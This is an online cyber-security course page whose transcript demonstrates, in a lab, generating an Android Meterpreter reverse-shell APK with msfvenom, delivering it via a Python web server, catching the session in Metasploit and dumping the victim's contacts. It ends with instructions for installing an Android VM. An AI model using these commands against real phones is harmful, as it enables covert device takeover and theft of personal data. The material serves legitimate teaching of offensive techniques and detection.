1. Home
  2. Training Library
  3. 3. Weaponization

How To: Mobile Malware

Developed with
QA

Contents

keyboard_tab
Cyber Primer Online Learning
1
Weaponization
PREVIEW15m 14s

The course is part of this learning path

Cyber Primer
course-steps
5
description
1
play-arrow
How To: Mobile Malware
Overview
DifficultyBeginner
Duration24m
Students131
Ratings
4.5/5
starstarstarstarstar-half

Description

This module will look at weaponization, or how hacking exploits can be created and disguised. The software simulations will cover the creation of mobile and desktop payloads.  

  • Weaponization 
  • Obfuscation 
  • Encryption 
  • Ciphers 
  • Desktop Malware 
  • Mobile Malware  
  • Windows App Malware Creation  
  • Mobile Malware Creation  

Please note: this content was produced in the UK and may include the use of British English. 

Intended Audience  

Although perceived as an IT issue, cyber security is, in fact, a subject relevant to all business units. Cyber Primer is aimed at anyone with an interest in cyber security, whether they are looking to pursue a career as a penetration tester, or just want to get a feel for the world of cyber security.  

 

Prerequisites of the Certifications 

There are no prerequisites for this course, however, participants are expected to have a basic understanding of computers and the internet. 

 

Feedback 

We welcome all feedback and suggestions - please contact us at qa.elearningadmin@qa.com to let us know what you think. 

Transcript

In this video we will create and test an Android payload. To follow along you will need to follow the instructions to install an Android virtual machine below the video. We will examine the functionality available to us once we have command and control over the affected device, and examine the network traffic that is sent over the C2 channel to better understand how to detect this kind of threat in the future. Open the Kali VM. Log in using username root with the password toor. Open a terminal by clicking the small black box icon on the left of the screen, second from the top on the left. First we will create an undisguised Meterpreter payload, by running msfvenom -p android/meterpreter/reverse_tcp LHOST equals 10.0.2.30 LPORT equals 4444 R /root/Desktop /ExampleDomain.apk. Now we need to test it. Launch the Android VM. While it's loading return to Kali. We're going to create a web server to deliver the payload and also set up a handler to receive the command and control channel that will leave the Android device and connect back to us. You will find the handler in the notes section of this video. First, let's set up a web server. Now type python -m SimpleHTTPServer 80. This has started a small web server that will serve the contents of the attacker desktop. We must launch a new terminal now. Press Control + Shift + T to do so. Now launch Metasploit by typing msfconsole -r handler.rc. This will launch Meterpreter with the correct arguments preconfigured for the sake of time. If you'd like to see the arguments, feel free to open android_handler.rc in a text editor. Now on the victim, open a web browser, and go to http://10.0.2.30. This will bring up a web page with ExampleDomain.apk. Click the link, download, install, and open the app. Back at the Kali VM, you will notice that the terminal with msfconsole running has now established a session with the compromised device. You can now control this device. You are now inside the phone. Type help to see what you can do. We will now steal contacts from the device. Type dump_contacts. This should save the device's contacts into a text file on the attacker machine. Open a new terminal and type cat, followed by the name of the file that you just created. You can copy and paste it to save time. You are now inside the phone. Type help to see what other commands are at your fingertips and have a play.

 

 --Android VM Installer--

In order to boot an Android VM, first, you will need to have:  

  1. VirtualBox installed and  

  2. Downloaded an Android ISO: Android 10 is the current OS, and you can find a source for an ISO here https://www.android-x86.org/. For this demo, we’re running through installing Marshmallow – Android 6. 

It’s worth remembering that Android Operating System updates are often not pushed out by the mobile carrier, so playing around with a few older OS’s (when you’ve gotten to grips with the basics!) is worth a try.  

When you have the ISO downloaded, you’ll want to get it started. To begin, open VirtualBox, then select the “New” button to create a new virtual machine.  

Name the virtual machinethen select “Linux” as the type and “Linux 2.6 / 3.x / 4.x (32-bit)” as the version. Select next to go to the memory menu. You’ll then need to select the amount of memory. If you’re using a 32-bit Android build, it can only handle up to 2048MB (2GB’s) of Memory. The 64-bit build allows you to use as much as you would like.  

Then, select “Create” to start building your Virtual Machine. The hard disk size should be automatically set as Dynamically Allocated, which will allow the virtual hard disk to grow as needed; leave this selected and select next.  

On the next step, you can choose how much storage you’d like to top the virtual machine out ateven though it will dynamically resize, it won’t be allowed to grow past the size you define here. Choose whatever size will work best for your system. 

Finally, select create button. This will create the Virtual Machine. You’ll then need to install the Android ISO on to the Virtual Machine. With your machine all set up, highlight it and select Start at the top of Virtualbox. 

When the machine starts up, point it to the Android ISO you downloaded. It should allow you to choose this as soon as you fire it up, but if not, select on Devices > Optical Drives > Choose Disk Image and select your Android ISO. Then use Machine > Reset to restart the virtual machine. 

Once the virtual machine loads the ISO, you’ll be presented with a list of install options. Use the keyboard to scroll down to “Install” and press enter. This will start the Android installer. 

Next, you’ll be presented the option to choose a partition. Select “Create/Modify” partitions. On the GPT screen, just choose “No.” 

On the disk utility screen, select “New.” 

Then select “Primary” to create a primary disk and allow it to use the entire virtual hard disk space you chose earlier. This should be selected by default. 

Hit Enter on the “Bootable” option to make the partition bootable, then choose “Write.”  

You will need to type “yes” and select Enter on the following screen to verify you want to write the partition table to the disk. 

Once it’s finished, highlight the Quit option and select Enter. 

Select the partition you just created to install Android on and tap Enter. 

Select “ext4” to format the partition. 

Highlight Yes and tap enter on the next screen to verify. 

Select “Yes” to install the GRUB bootloader. 

Se;ect “Yes” to make the /system folder re-writable. 

Once everything is finished, you can choose to reboot into Android or reset. Feel free to do either, but don’t forget to unmount the ISO file first. Otherwise it’ll just boot right back into the installer. 

And that’s it! Next, you’ll be able to boot up the Android device and run the virtual machine just like a phone, although you won’t be able to make any calls. You’ll also need to leave the Wi-Fi turned off, as the virtual machine will use your PC’s connection.   

 

 

About the Author
Students524
Courses5
Learning paths1

Originating from a systems administration/network architecture career, a solid part of his career building networks for educational institutes. With security being a mainstay his implementation he grew a strong passion for everything cyber orientated especially social engineering. The educational experience led to him mentoring young women in IT, helping them to begin a cyber career. He is a recipient of the Cisco global cyber security scholarship. A CCNA Cyber Ops holder and elected for the CCNP Cyber Ops program.